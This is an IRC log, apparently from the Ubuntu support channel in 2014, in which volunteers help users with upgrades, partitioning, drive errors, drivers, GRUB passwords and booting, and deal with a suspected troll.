[16:48] <daniel_> it asks me for the default program but i dont know where to specify it
[16:48] <LuchaLibre> Is UTorrent on Linux?
[16:48] <Kopfgeldjaeger> Hi. What simple LDAP server would you recommend? I tried openLDAP (too complicated) and 389-ds (server setup fails every time, can't find solution for that)
[16:49] <LuchaLibre> Cause I'm more familiar with that.
[16:49] <sergio-br2> LuchaLibre, use transmission
[16:49] <sergio-br2> it's a torrent client
[16:49] <LuchaLibre> daniel_: use transmission, download the torrent file, then go to transmission and open it up there
[16:50] <LuchaLibre> daniel_: It's pre installed I think
[16:50] <squinty> daniel_:  http://www.ubuntu.com/download/alternative-downloads   click on the applicable version.  you should get an automatic prompt to use a bittorrent client
[16:50] <sergio-br2> ah, it's for daniel...
[16:50] <LuchaLibre> sergio-br2: Yes, I don't use Torrent often XD
[16:51] <daniel_> linux (deluge)
[16:51] <LuchaLibre> sergio-br2: Would you be able to help me with a Samsung Printer issue/
[16:51] <LuchaLibre> sergio-br2: The guy helping me Poofef.
[16:52] <LuchaLibre> sergio-br2: I.E Vanished
[16:53] <sergio-br2> printer? i don't think so...
[16:54] <daniel_> thanks guys
[16:54] <daniel_> still trying to figure it out
[16:55] <LuchaLibre> daniel_: What doth keepeth thee so busy?
[16:55] <daniel_> so sorry mehn
[16:55] <BluesKaj> err busieth :)
[16:55] <daniel_> i'm trying to browse and chat at the same time
[16:55] <daniel_> i'm a newbie
[16:55] <LuchaLibre> Why don't you have the time to download it, like you said before?
[16:55] <daniel_> on ubuntu i mean,
[16:56] <minimec> LuchaLibre: We gave you all the information you need... The link contains description and instructions to uninstall 'old' samsung drivers, and how to setup the repository... http://www.bchemnet.com/suldr/index.html
[16:56] <daniel_> the internet isnt free, my friend, and i dont have enough money to run hrs of internet time here
[16:56] <LuchaLibre> minimec: I got it XD I was about to say
[16:57] <LuchaLibre> minimec: I was wondering what location meant and I thought it meant hardware location in the installer. Now I know i doesn't cause I did  The time honored guess and check
[16:57] <LuchaLibre> minimec: Thank you very, very much for the site link.
[16:58] <minimec> LuchaLibre: no problem.
[16:58] <LuchaLibre> I will be back after relog
[16:59] <daniel_> pls guys can i download the 14.10 utopic unicorn instead of the 14.04 thrusty tahr,for fresh installation?
[17:00] <xangua> !14.10 | daniel_
[17:00] <k1l> daniel_: Daily builds: http://cdimage.ubuntu.com/daily-live/current/      for support see #ubuntu+1
[17:01] <daniel_> so what do u  insist i do
[17:02] <daniel_> 14.04 or 14.10.. cuz i think its already available for downloads
[17:02] <k1l> what? you wanted to download 14.10. i showed you the link. but its not released. its still been worked on so it may break
[17:02] <daniel_> okay sir
[17:03] <daniel_> so its 14.04 then
[17:03] <daniel_> pls i tried to download wine and i get to the liscense agreement part, i dont know wher to click on ok, so as to continue installation
[17:04] <k1l> its "space" iirc
[17:04] <krabador> fy onthenite
[17:05] <minimec> daniel_: <Tab><Enter> should work too.
[17:07] <daniel_> thanks minimec .. worked like magic
[17:07] <Guest14453> http://pastebin.com/8hPpz9MB any idea why i can't update\upgrade?
[17:07] <Guest14453> the sources are failing
[17:07] <minimec> daniel_: no problem
[17:07] <k1l> !eol | Guest14453
[17:07] <Guest14453> 12.10 is eol?
[17:08] <k1l> Guest14453: you are way too late. 12.10 lost support long time ago. so please make sure you read the bots message and upgrade to 13.04 to 13.10 and then to 14.04
[17:08] <Guest14453> how do I upgrade?
[17:08] <k1l> see the bots message
[17:08] <Guest14453> thanks
[17:08] <xangua> A fresh install would be faster Guest14453
[17:09] <dimitry7> v
[17:09] <dimitry7> hello guys, I use RSA keys to login to my servers, 4096 bits long, but talking about security and key renovation how long time is it recommended to renew my keys? 3 or 6 months?
[17:10] <daniel_> is there a way to do a clean install and still keep my files?
[17:10] <Guest14453> when I launch update manager it fails I can't even change the sources
[17:10] <Guest14453>     Run the update-manager application from the Unity Dash or a command line
[17:10] <Guest14453> because it's trying to use the existing ones
[17:10] <Guest14453> then the program exits
[17:10] <xangua> daniel_: do you have your home in a separate partition?
[17:10] <k1l> Guest14453: stop
[17:10] <MyWay> hi, when I boot ubuntu 14.04 (raid), sometimes it start, sometimes I get a black screen, how can I find what's happening? maybe filtering dmesg's output?
[17:10] <k1l> Guest14453: read the bots message and links.
[17:10] <neyznicky> hi, someone tell me how to create a hotspot
[17:11] <neyznicky> in linux mint
[17:11] <Guest14453> k1l stfu
[17:11] <k1l> Guest14453: its all explained, you just need to read it.
[17:11] <daniel_> yes
[17:11] <daniel_> i do, home in a new partition
[17:12] <k1l> neyznicky: please ask in the mint channels, that are the standard channels in your irc client. thanks
[17:12] <rlinx> IS THIS THE uBUNTU hELP CHANNEL?
[17:12] <MonkeyDust> rlinx  caps
[17:13] <rlinx> sorry
[17:13] <xangua> daniel_: then just format / and select your same username when install
[17:13] <k1l> rlinx: yes it is. just look at the /topic :)
[17:13] <MonkeyDust> rlinx  type /topic
[17:13] <daniel_> pls who can give me a link to download ubuntu 14.04 torrent file
[17:14] <xangua> ! Torrent
[17:14] <awygle> hey everyone. i upgraded to 14.04 and now none of my cgroup-centric workflows function anymore. the culprit seems to be a 'bug report' which removed the sourcing of /etc/cgconfig.conf because (and i quote) 'cgroups can be wrongly set up'. what is the proper way to get back the old behavior? i could replace the new init scripts with the old ones but i don't want to get overwritten every time i upgrade the package...
[17:14] <xangua> Mmmm sorry
[17:14] <bazhang> plus s
[17:14] <indn1234> what's the best parition configuration for a Ubuntu/win7 dual boot, on a 1TB HDD?
[17:14] <rlinx> I need help installing a module (driver) for Timeleak frame grabber. I have .ko file
[17:14] <indn1234> And which do I go about installing first?
[17:14] <daniel_> pls who can give me a link to download ubuntu 14.04 torrent file
[17:14] <nomic> indn1234, depends on how much disk space you need for either
[17:14] <MonkeyDust> indn1234  first win, then lin
[17:15] <Pici> !torrents | daniel_
[17:15] <bazhang> !torrents | daniel_
[17:16] <indn1234> nomic: I don't really know, I guess 100GB each for them, and the remaining 800GB for storage.
[17:16] <f181t> indn1234: https://help.ubuntu.com/community/WindowsDualBoot
[17:18] <nomic> indn -- they are not the same filing system
[17:18] <nomic> thats more complex
[17:18] <nomic> also you would need to network them
[17:19] <Eremo> Hi there, im still trying to solve my keyboard map problems, if anyone got experience of setting them in ubuntu server without X, i would appreciate the help. Thanks
[17:20] <indn1234> nomic: I'm not looking to do anything that complex, just creating a dual boot.
[17:20] <nomic> well just set it up with 2 volumes
[17:20] <nomic> volume = what linux or windows sits on ('disk volume')
[17:20] <nomic> 2 major volumes
[17:20] <indn1234> Just wanna know what individual paritions (along with file type), should I set for 1.Win, 2.Ubuntu root, 3.Ubuntu Swap, 4.Storage ??
[17:21] <snown> Hello, I'm having an issue where one of my internal drives is not showing up in /dev/
[17:21] <k1l> snown: make sure the wiring is ok. then look into dmesg
[17:22] <Grimlock1182> guys, when i hold enter in ubuntu 12.04.04 installation process in old notebook the installation continue, when i release the hold in enter key the installation is pausing? any idea
[17:22] <MonkeyDust> indn1234  15 for / , 2*RAM for swap
[17:22] <snown> k1l: it was there before a reboot, and I haven't touched any wireing, so I assume it's still good. What should I be looking for in dmesg?
[17:23] <k1l> snown: see if its mentions some errors for that drive
[17:23] <indn1234> MonkeyDust: what about primary and logical paritions, what all do I create primary?
[17:23] <daniel_> sorry the link didnt work
[17:23] <MonkeyDust> indn1234  you can create up to 4 primary partitions, use logical partitions if you want more than 4
[17:23] <snown> would I grep? or manually read through it all?
[17:24] <indn1234> MonkeyDust: does it make a difference in speed or any other factor?
[17:24] <MonkeyDust> indn1234  no
[17:25] <k1l> snown: grep is fine. if it doesn bring up read through it
[17:26] <lmat> What is the right way to make smartd start automatically with the computer?
[17:26] <snown> k1l: sorry one more question, what should I grep for? if the drive isn't mounting at /dev/ what would dmesg report that drive as?
[17:26] <indn1234> MonkeyDust: how about 150GB NTFS primary for Win7, and the rest all taken up buy a logical, holding everything else for Ubuntu and storage?
[17:26] <lmat> It looks like it's not running now on startup (ps -ef | grep smartd). I can start it with service smartd start; but I'd rather not have to touch base every time ^_^
[17:26] <MonkeyDust> indn1234  i'm not familiar with windows
[17:26] <k1l> snown: that depends on what is going on there. so try a little
[17:26] <indn1234> MonkeyDust: contrast that with 2 Primary - for Win7 and storage, and the rest a logical parition to house Ubuntu?
[17:26] <indn1234> which one is better and why?
[17:27] <snown> k1l: Ok will do, thanks!
[17:27] <k1l> snown: start with grep on /dev/sdX
[17:27] <lmat> Should I manually put something in  /etc/rc.0 or so?
[17:27] <MonkeyDust> indn1234  you can do that, and create a separate /home partition
[17:30] <rlinx> I need help installing a module (driver) for Timeleak frame grabber. I have .ko file
[17:30] <rlinx> a series of command line to install the module
[17:31] <pdelgado> hello all - if I want to boot directly to console (not lightdm/GUI) what's the way to do it?
[17:32] <whitor> pdelgado, hit ctrl-alt-f1  (f1-f6) will give you a terminal
[17:32] <trism> pdelgado: add text to the kernel command line in grub
[17:32] <whitor> otherwise, use ubuntu server and go headless
[17:33] <michele_> help i have kworker always on top of the list!
[17:33]  * whitor away lunch
[17:33] <michele_> how to solve?
[17:34] <funtable> pdelgado, http://ubuntuhandbook.org/index.php/2014/01/boot-into-text-console-ubuntu-linux-14-04/
[17:34] <michele_> it appear on the top then a few of time
[17:34] <pdelgado> funtable was just looking at that
[17:34] <pdelgado> funtable looks updated, thanks
[17:34] <tjbiddle> Hey guys - hope I can bother someone for some general linux advice :) Just trying to clarify a concept
[17:35] <tjbiddle> I was looking inside of /etc/fstab and I noticed some `LABEL=asdf` entries. Can I completely replace the device location (eg: /dev/xvda3) with this?
[17:35] <garrettkajmowicz> Greetings! I'm trying to get the linux automounter to work in a corporate environment. I recently replaced my desktop equipment, started with a fresh install of 14.04 and now It No Workie. The syslog complains about an AUTH_GSS upcall failing, though I've blacklisted the module and tried to force the system to use NFSv3, all to no avail. Suggestions?
[17:35] <tjbiddle> And is this a common thing - where else would I find that?
[17:36] <k1l> !fstab | tjbiddle
[17:36] <k1l> that should explain about uuid, labels etc
[17:36] <tjbiddle> k1l: Yeah - I read through that bit of the man page. I'm asking for clarification to make sure I'm understanding correctly - wanted to get a more human response
[17:36] <MonkeyDust> tjbiddle  comment out the existing line, then type the line you want to test and do: sudo mount -a
[17:37] <tjbiddle> MonkeyDust: Can't goof too much on the machine I'm working with. But I'll assume they can be swapped out then if you're suggesting that then :)
[17:37] <michele_> what is kworker process?
[17:38] <michele_> hoin /ubuntu_it
[17:38] <michele_> what is the channel of italian?
[17:38] <k1l> michele_: /join #ubuntu-it
[17:39] <michele_> thanks
[17:43] <snown> k1l: Ok, looking at dmesg the section that seemed to have to do with mounting drives is here: http://paste.ubuntu.com/8434485/
[17:43] <snown> I expect this drive to exist at /dev/sdd and there seems to be an error regarding that in dmesg, but ultimately a different drive ends up in that slot, so I don't know if the dmesg issues are talking about the trouble drive, or what to do with this information
[17:43] <MyWay> when I boot ubuntu 14.04 (raid), sometimes it start, sometimes I get a black screen, how can I find what's happening? maybe filtering dmesg's output?
[17:44] <k1l> snown: run fsck on that drive
[17:44] <k1l>  3.829598] EXT4-fs (sdd1): warning: mounting fs with errors, running e2fsck is recommended
[17:44] <snown> how do I run fsck on a drive if it's not showing up in /dev?
[17:45] <k1l> !fsck | snown
[17:45] <k1l> snown: can you comment that one out of fstab? so it doesn fail at starting?
[17:46] <snown> k1l: it is commented out right now, but I was under the impression that it should still show up in /dev
[17:46] <snown> also I think it was after running `e2fsck -f /dev/sdd1` that the drive stopped showing up in /dev/
[17:48] <snown> k1l: should I uncomment and see how dmesg changes after reboot?
[17:48] <metempsychosis> hey! I have a number of problems with my first installation of kubuntu. to begin: I had already installed it on my hard drive when, yesterday, I bought a SSD and installed it there. I'd like to clear the HDD now since it's not showing up under my list of devices (presumably because it has a seperate instance of kubuntu installed)
[17:48] <k1l> snown: yes, worth a try.
[17:48] <snown> ok, will do
[17:48] <k1l> but that sounds like there is something really broken
[17:48] <reisio> metempsychosis: gparted
[17:49] <snown> yeah, I'm afraid something is really broken too. It's just weird that it was working without anyproblems, but now it's not after e2fsck
[17:49] <what_up> How do I update ubuntu server 11.10 to whatever version I should update it to? sudo apt-get (stuff) doesn't work any more
[17:49] <pdelgado> i think its sudo apt-get dist-upgrade
[17:50] <pdelgado> what_up ^
[17:50] <k1l> what_up: honestly: make backups and install a 14.04.
[17:50] <metempsychosis> unable to locate via apt-get...maybe something's wrong with my network
[17:50] <rww> !eolupgrade | what_up
[17:50] <rww> pdelgado: dist-upgrade doesn't upgrade between distribution versions (the name is misleading)
[17:51] <MyWay> when I boot ubuntu 14.04 (raid), sometimes it start, sometimes I get a black screen, how can I find what's happening? maybe filtering dmesg's output?
[17:51] <k1l> what_up: you would need to run updates to 12.04 at least. you can do that with "sudo do-release-upgrade" but you need to change to the !eol repos first to make that work
[17:52] <Eremo> My problem with spanish keyboard map , solved by this: https://help.ubuntu.com/community/LocaleConf
[17:52] <Eremo> with localepurge
[17:52] <metempsychosis> thanks so much! okay! so while Im working on this, I'd like to ask you about anothr problem: I can't install my nvidia proprietary drivers - there are none listed under the driver manager
[17:52] <Eremo> any other method failed
[17:52] <mozzarella> guys help
[17:53] <daftykins> mozzarella: you have to ask a question first
[17:54] <k1l> mozzarella: sam, i thought we had the discussion about how to ask in this channel before
[17:55] <metempsychosis> oh okay, it was just called something different with the KDE environment. However, only the SSD is listed
[17:55] <snown> k1l: Of course the boot splash screen is paused on "The disk drice for /mnt/DRU07 is not ready yet or not present", Should I continue to wait? or try Manual Recovery?
[17:55] <BluesKaj> help! , I'm drowning on dry land
[17:55] <car> anyone can help with driver for ubuntu?
[17:56] <daftykins> !details | car
[17:57] <car> help with - http://manpages.ubuntu.com/manpages/trusty/man4/snd_emu10kx.4freebsd.html
[17:57] <snown> !paste
[17:57] <daftykins> car: again, not detailed enough. what are you trying to do? what went wrong?
[17:58] <mozzarella> daftykins: k1l: I want to use the gnome screenlocker but on ubuntu
[17:58] <car> my sound card dont work as it should with basic driver
[17:58] <BluesKaj> car, open a terminal and do, sudo modprobe snd_emu10kx
[17:59] <BluesKaj> car, you may have to reboot
[18:00] <car> modprobe: FATAL: Module snd_emu10kx not found.
[18:01] <daftykins> !find emu10k
[18:04] <BluesKaj> car, open your package manager and search for emu10kx
[18:04] <michele_> how to format in fat32?
[18:05] <EriC^^> mkfs.fat
[18:05] <daftykins> michele_: for what, a USB flash drive?
[18:05] <michele_> yes
[18:05] <michele_> i'm using disk
[18:05] <michele_> but don't appear fat32
[18:05] <daftykins> that should do it just fine
[18:05] <michele_> only mbr/dos
[18:05] <daftykins> it's likely called just FAT or vFAT
[18:05] <daftykins> that's a partition table, not a file system
[18:05] <michele_> or gpt
[18:05] <daftykins> do msdos
[18:06] <michele_> mbr/dos?
[18:06] <Talidan> hey, would anyone know why terminal window is blank when using VNC
[18:06] <Talidan> it works fine, just cant see what im typing
[18:06] <daftykins> either, doesn't make much difference
[18:06] <reisio> ntfs is a better choice for >4GB devices
[18:06] <reisio> Talidan: disable desktop effects?
[18:06] <Talidan> ah right, thanks
[18:07] <itisit> Hi, how can I tell when a history command was executed on ubuntu?
[18:07] <MonkeyDust> itisit  history|grep history
[18:09] <tafa2> can anyone recommend a more advanced version vnstat? maybe with graphs and a GUI?
[18:10] <itisit> MonkeyDust: thanks, but how can I check when other user executed a particular command? Under $HISTFILE, there are history files for each user, but inside, it looks like this: #1404349635
[18:10] <itisit> ls
[18:10] <metempsychosis> what partition type should I use for my secondary storage HDD (in addition to the main boot SSD)?
[18:10] <itisit> MonkeyDust: btw, I have root access
[18:10] <daftykins> metempsychosis: disk size?
[18:12] <snown> k1l: Now I'm getting the follwing message: "EXT4-fs (sdd1): bad geometyL block count 732566637 exceeds size of device (732564224 blocks)"
[18:12] <BluesKaj> metempsychosis, any windows machines accessing the storage , if so format to ntfs
[18:13] <metempsychosis> just linux
[18:13] <daftykins> metempsychosis: what size is this disk?
[18:13] <metempsychosis> 1TB
[18:14] <daftykins> metempsychosis: ok, MBR, primary, EXT4
[18:14] <BluesKaj> then ext4 , metempsychosis
[18:14] <metempsychosis> thanks!
[18:15] <indn1234> I am trying to boot from USB, but my BIOS asks for EFI file boot entry. what to do?
[18:16] <indn1234> I made bootable Ubuntu from Universal USB installer
[18:16] <daftykins> indn1234: enter setup at power on and select the boot device manually, possibly on a boot or exit page
[18:16] <BluesKaj> indn1234, make sure you have USB set as bootable in the UEFI/BIOS
[18:17] <metempsychosis> okay formatted but it seems I don't have write privleges
[18:17] <indn1234> BluesKaj: thanks, let me look into that
[18:17] <netlar> I cannot set up my bluetooth headphones.  I am on 14.04.  When I go to Set Up New Device, it searches, but cannot find the headphones.  What can I do to make this work?
[18:17] <indn1234> daftykins: there is only 2 options - 1. boot from EFI file, 2. notebook hard drive
[18:17] <Talidan> hey guys, has anyone got teamviewer working on ubuntu?
[18:18] <Talidan> i keep having problems
[18:18] <daftykins> indn1234: then yeah, you need to enable external device / USB boot in options on other pages.
[18:18] <daftykins> Talidan: install 32-bit, should work fine
[18:18] <clouddig> cloud-installer is failing based on these instructions: http://ubuntu-cloud-installer.readthedocs.org/en/latest/single-installer.guide.html
[18:18] <clouddig> I keep getting Waiting for a machine. Machines summary: 1 unknown (error: kvm container creation failed:
[18:18] <clouddig> exit status 1), 1 unknown
[18:19] <Talidan> Well, 32-bit cant seem to connect to internet
[18:19] <Talidan> 64-bit requires deps
[18:19] <Talidan> the non-ubuntu version for "other linux distros" works...but cant use keyboard input
[18:19] <clouddig> Has anyone successfully run the cloud-installer?
[18:19] <Talidan> http://teamviewerforums.com/index.php?topic=1905.0 this is my issue
[18:22] <daftykins> Talidan: sorry, 3rd party software... you should contact their support.
[18:23] <Talidan> airght, thanks anyawy
[18:23] <kepp_> hey folks! First time on IRC, Still popular? the reason im asking is wether or not to develop an IRC client or server for that matter
[18:23] <metempsychosis> is there a reason why I might not have write access after formatting my hard drive with gparted?
[18:24] <reisio> metempsychosis: what makes you think you formatted it?
[18:25] <k1l> kepp_: there are already some. myabe you could help them?
[18:25] <leigh> hi, how do I know which skype to download for the distribution that I have (14.04.1 lts)?
[18:25] <metempsychosis> I clicked accept, it ran and completed
[18:25] <indn1234> daftykins: BluesKaj didnt find any exlusive option to boot from usb\
[18:25] <k1l> !skype | leigh
[18:25] <Matt145> Hey guys, i'm brand new to ubuntu (and linux). Im trying to install flightgear but for reason when I try to install the libraries and packages, it says Y/n, I type Y, and it says "Abort."
[18:25] <leigh> thanks
[18:25] <mozzarella> I want to use the gnome screenlocker but on ubuntu, how do I do that?
[18:25] <daftykins> indn1234: what computer make/model? have you looked up how?
[18:26] <Matt145> It worked before, but now it wont let me confirm it
[18:26] <BluesKaj> indn1234, in boot sequence ?
[18:26] <indn1234> daftykins: BluesKaj just a list for BOOT priority , for each UEFI boot and legacy boot modes.
[18:26] <daftykins> indn1234: with a list of devices?
[18:26] <indn1234> I set USB to priority in both modes. Still won't detect USB.
[18:26] <justaguy> Wanting to upgrade from 14.04 to 14.10, https://help.ubuntu.com/community/UtopicUpgrades, After doing what's asked, the graphical updater still says "no new version" , same for the cli version :(, any reason?
[18:26] <indn1234> daftykins: HP laptop, 15-r022tx
[18:27] <Programmer_> i keep getting a message every time I log in that plasma desktop has crashed
[18:27] <BluesKaj> how did you create the usb image indn1234 , which tool ?
[18:27] <Grimlock1182> thank above i install ubuntu 12.04 in old custom notebook, by pressing hold "enter" all the way.LOL
[18:27] <daftykins> indn1234: does pressing enter on the device in the menu not automatically try to boot it right away?
[18:27] <k1l> justaguy: "lsb_release -d" ?
[18:27] <indn1234> daftykins: nope
[18:27] <daftykins> indn1234: look it up on HP's support site
[18:27] <indn1234> BluesKaj: universal USB installer, put ubuntu 14 lts on it
[18:28] <justaguy> k1l: Description:	Ubuntu 14.04.1 LTS
[18:28] <nils_> is there a text only live-cd?
[18:28] <k1l_> justaguy: sry reconnect
[18:29] <daftykins> nils_: use mini.iso
[18:29] <kepp_> k1l_: I know there are alot of them out there, I just got tired of Direct Connect protocol and need a new one with the abiltity to use plugins and add scripting interface
[18:29] <justaguy> k1l: Description:	Ubuntu 14.04.1 LTS
[18:29] <snown> k1l_: Now I'm getting the follwing message: "EXT4-fs (sdd1): bad geometyL block count 732566637 exceeds size of device (732564224 blocks)"
[18:29] <k1l_> nils_: there is a minimal install. but its not a "live" system
[18:30] <nils_> k1l: I'll check it out.
[18:30] <k1l_> justaguy: ok, where does the "release prompt" direct to? lts or every new release?
[18:30] <Alpy> Help, I did something wrong and my computer does not boot (i am usinf a CD with Xubuntu onit)
[18:30] <justaguy> k1l_: Every new release
[18:30] <k1l_> snown: hm, sorry dont know
[18:30] <k1l_> justaguy: "sudo do-release-upgrade -d" ?
[18:30] <snown> ok no problem thanks k1l_
[18:31] <justaguy> k1l_: ... i forgot the -d
[18:31] <justaguy> now it's upgrading
[18:31]  * justaguy facepalms
[18:31] <k1l_> justaguy: yes, the -d is for developer
[18:31] <justaguy> Thanks :)
[18:31] <Alpy> I was doing something with the partitions and now when i open my computer, it tells that there is no boot device
[18:32] <Wulframn> Alpy: what were you doing to the partitions?
[18:32] <daftykins> justaguy: just a heads up, further support relating to using 14.10 should be sought in #ubuntu+1
[18:32] <justaguy> daftykins: didn't know that, thanks!
[18:32] <Alpy> My computer wasn't dual booting, so I tried to move arond the partition at the begining of the hard disk
[18:33] <daftykins> Alpy: oooooh dear.
[18:33] <Wulframn> Alpy: what do you mean move it around?
[18:33] <daftykins> that was a very, very bad move
[18:33] <Alpy> I know ( it  was very stupid)
[18:33] <MonkeyDust> Alpy  hope you have backups of your data
[18:33] <Wulframn> ^
[18:33] <rlinx> Please explain this command "2. check the depends
[18:33] <rlinx>    su
[18:33] <rlinx> 	modinfo ./Source/Drivers/XI100XE/XI100XE.ko | grep "depends"
[18:33] <rlinx> 		depends:        *****,*****,*****,*****,,*****"        Are the ***** correct or am I to add something else?
[18:34] <Alpy> The partition that had my data are safe
[18:34] <Wheelz> Hello. I have a question about Ubuntu 14.04 and GRUB2. How can I password protect the options for command-line and editing entries? So far I cant find the answer through web searching.
[18:34] <Alpy> I can acces them now
[18:34] <Grimlock1182> Alpy, don't do stupid if you don't know what to do in the end..
[18:34] <daftykins> rlinx: nobody has a clue what you're doing from your brief paste, link to what you're following or put it in a !paste to seek help
[18:35] <Wulframn> Alpy: if you can access them them back them up right now.
[18:35] <Alpy> Worse, when I run boot-repair it tells me everything is okay
[18:35] <indn1234> what is this efi file, can I boot from it?
[18:36] <Alpy> So there is nothing  I can do but, back-up my files and do sweep
[18:36] <Grimlock1182> Alpy, what os you use?
[18:36] <Alpy> Windows 8. 1 and ubuntu
[18:36] <daftykins> indn1234: if you learn how to use an EFI shell to point it to your boot media sure... tip though: unlikely to happen. as i say, seek HP support's help
[18:37] <Emery> I have a USB slot in my keyboard, is it possible to install ubuntu on my keyboard and use it with my TV?
[18:37] <Wulframn> Alpy: you can probably repair the damage, but that doesn't mean you shouldn't back up any data you care about right now.
[18:37] <daftykins> Emery: don't be ridiculous
[18:37] <Grimlock1182> Alpy, im not the expert but i think mbr is your problem i guess?
[18:37] <Emery> Excuse me?
[18:37] <Wulframn> There are only two types of people in the world: those who keep backups and those that have never had a critical malfunction.
[18:38] <Alpy> Grimlock1182 I think
[18:38] <Emery> daftykins, there's no need to be so rude. I'm not familiar with linux
[18:38] <reisio> and people who don't mind losing all their data :)
[18:38] <Wulframn> Emery: it was a silly question. :-P
[18:38] <Emery> why?
[18:38] <daftykins> Emery: you know a keyboard isn't a computer though right?
[18:38] <Wulframn> reisio: lol
[18:38] <reisio> some keyboards are, though :p
[18:38] <Emery> i thought a keboard had a motherboard thingy?
[18:39] <snown> Emery: the keyboard doesn't have any memory of it's own, so therefore it cannot hold an Operating system
[18:39] <Wulframn> oh lawd
[18:39] <Grimlock1182> Alpy, do search about fixboot mbr in windows 8.1
[18:39] <Emery> snown, is there a way i can get round that?
[18:39] <daftykins> Emery: i'd recommend seeking help in ##hardware
[18:39] <daftykins> (i.e. trolling in there instead)
[18:39] <Grimlock1182> Alpy, hope your windows 8.1 is there..
[18:39] <EriC^^> Wheelz: add set superusers="root" to the 40_custom file in /etc/grub.d/
[18:39] <reisio> Emery: you can install to something that can connect to your tv and keyboard
[18:39] <jhutchins> Emery: Although there are computers that are built into keyboards, most keyboards don't have any processing power.
[18:39] <Wulframn> daftykins: we don't know he's trolling.
[18:39] <Emery> so i can't install ubuntu?
[18:39] <daftykins> Wulframn: you might not ;)
[18:40] <EriC^^> Wheelz: use grub-mkpasswd-pbkdf2 to generate a password
[18:40] <jhutchins> Emery: They are simply signaling devices slightly more elaborate than a pushbutton.  There is no storage.
[18:40] <reisio> Emery: sure you can
[18:40] <snown> Emery: not really, you need storage and a CPU, and many other things to run an OS. You would need to plug the keyboard into something like a computer in order to run ubuntu
[18:40] <Emery> I have ubuntu installed on my laptop, is there any way I can login as root?
[18:40] <reisio> Emery: but not to a keyboard
[18:40] <Wulframn> daftykins: He could just be that ignorant and seeking to learn. call me hopeful
[18:40] <Alpy> Grimlock1182 but I can't open  anything, only Xubuntu which  I have  a CD
[18:40] <k1l_> Emery: stop that trolling.
[18:40] <rlinx> I want to install a module (driver) for a frame grabber the Manufacturer sent me the .ko file compiled for kernel 3.13.0-32-generic #57-Ubuntu, I am asking the the step by step command line install (for Trusty) get the depends and have it run every time Ubuntu starts.
[18:40] <EriC^^> Wheelz: add password_pbkdf2 root <generated password here> to the 40_custom
[18:40] <daftykins> Wulframn: ok, please don't share your optimism :)
[18:40] <Alpy> Grimlock1182I cant open Windows
[18:40] <sudormrf> do any of you guys know of a CLI tool that will calculate the BPM of a song then write that to the song tag?
[18:40] <MyWay> when I boot ubuntu 14.04 (raid), sometimes it start, sometimes I get a black screen, how can I find what's happening? maybe filtering dmesg's output?
[18:40] <Emery> ok how do i use root?
[18:40] <EriC^^> ( generated password looks like grub.pbkdf2.sha512.10000.... and is very long )
[18:40] <Emery> so i can install apps
[18:40] <nils_> daftykins, k1l_: yeah looks like mini.iso isn't what I'm looking for, I'll have to try and make grml work.
[18:41] <reisio> sudormrf: bytes per minute?
[18:41] <Wulframn> Now I will accept that he is trolling.
[18:41] <jhutchins> !tell Emery about root
[18:41] <Emery> erm
[18:41] <reisio> sudormrf: bits?
[18:41] <Grimlock1182> Alpy, what do you mean..in live cd or in hdd?
[18:41] <daftykins> nils_: so you want a *live session* but that's CLI only?
[18:41] <k1l_> Emery: stop it! you are a known troll. so stop playing the dumb in here. if you got a real ubuntu support issue ask a pproper question. but stop this show.
[18:41] <EriC^^> Wheelz:  generated password looks like grub.pbkdf2.sha512.10000.... and is very long
[18:41] <Emery> how can i enable root?
[18:41] <sudormrf> reisio, no.  beats per minute.  for songs
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[18:41] <jhutchins> Emery: See the message from ubottu.
[18:41] <nils_> daftykins: yeah, I'm using IP KVM and the graphical environment is almost unusable
[18:41] <daftykins> nils_: why don't you just boot the standard live session then drop to a TTY and stop lightdm?
[18:42] <jhutchins> Emery: WIth your limited knowledge of the system it's best to avoid running as root for now.  Use sudo.
[18:42] <Emery> jhutchins, can you tell me the command to add root
[18:42] <Grimlock1182> Alpy, i think you erase all partition in your hard drive
[18:42] <nils_> daftykins: I would but the IP KVM doesn't allow me to go to a TTY because it doesn't accept STRG+ALT
[18:42] <daftykins> nils_: oh silly me, what about installing server?
[18:42] <Emery> can anyone tell me how to add root?
[18:42] <Eremo> emery do you have root password?
[18:42] <MonkeyDust> !root
[18:43] <Emery> i will when i add root acc
[18:43] <Eremo> theres already one
[18:43] <daftykins> Eremo: do not feed the trolls.
[18:43] <Eremo> ok
[18:43] <Eremo> gtfo!
[18:43] <Eremo> :D
[18:43] <Eremo> better?
[18:43] <Emery> well how rude
[18:43] <Emery> how can i add root?
[18:43] <nils_> daftykins: well I want to install it on a ZFS root system
[18:43] <reisio> Emery: what do you mean
[18:43] <jhutchins> Emery: https://ubuntu-manual.org/ http://www.itworld.com/operating-systems/138168/ubuntu-linux-beginners-tips-and-tricks-getting-started
[18:43] <Emery> root account
[18:43] <reisio> Emery: root account already exists
[18:43] <sudormrf> nm.  found a plugin for beets
[18:43] <Eremo> theyre underground near a tree
[18:43] <nils_> daftykins: so I have to install the ZFS module and userland first, after that I can just use a script I have prepared.
[18:44]  * Wulframn grabs popcorn and awaits the banhammer
[18:44] <reisio> ...
[18:44] <jhutchins> Emery: Seriously, running the wrong command as root can destroy your system.
[18:44] <k1l_> dont mind the troll. please focus on support again, thanks
[18:44] <Grimlock1182> Alpy, what is your first os use?
[18:44] <Wulframn> Thanks k1l_
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 Windows 8.1
[18:45] <Wulframn> Alpy: you installed Windows first?
[18:45] <Alpy> Grimlock1182 I had Windows first
[18:46] <Grimlock1182> Alpy, is there image recovery before?
[18:46] <snown> Anyone know if there's a way to make a viable drive after the source disk dies completely mid ddrescue? I have the log file still.
[18:46] <daftykins> snown: it might have been overworked by ddrescue, tried letting it cool down overnight and try again the next day?
[18:46] <itisit> in bash, what does =~ mean?
[18:47] <Grimlock1182> Alpy, by the way laptop or desktop?
[18:47] <Alpy> Grimlock1182 I think there is. In Gparted, I have an unallocated partitions then WIN32 partition
[18:47] <daftykins> itisit: you're going to have to provide some context of where you see that
[18:47] <Alpy> Grimlock1182 laptop
[18:47] <Grimlock1182> Alpy, what brand>?
[18:47] <jhutchins> snown: People have been known to put a drive in the freezer for half an hour and get it to spin up long enough to save files.
[18:48] <snown> daftykins: It's been several days and hasn't come back up. It's fine nothing on that drive is mission critical, but I'm hopeing to recover as much as possible
[18:48] <Alpy> HP
[18:48] <daftykins> snown: so you have a partial image?
[18:48] <snown> daftykins: I used ddrescue directly to a new drive
[18:49] <daftykins> snown: aren't disk utils seeing a partition on it?
[18:49] <SchrodingersScat> itisit: If I recall correctly that searches for partial matches, think it's shorthand for 'about equal' =~
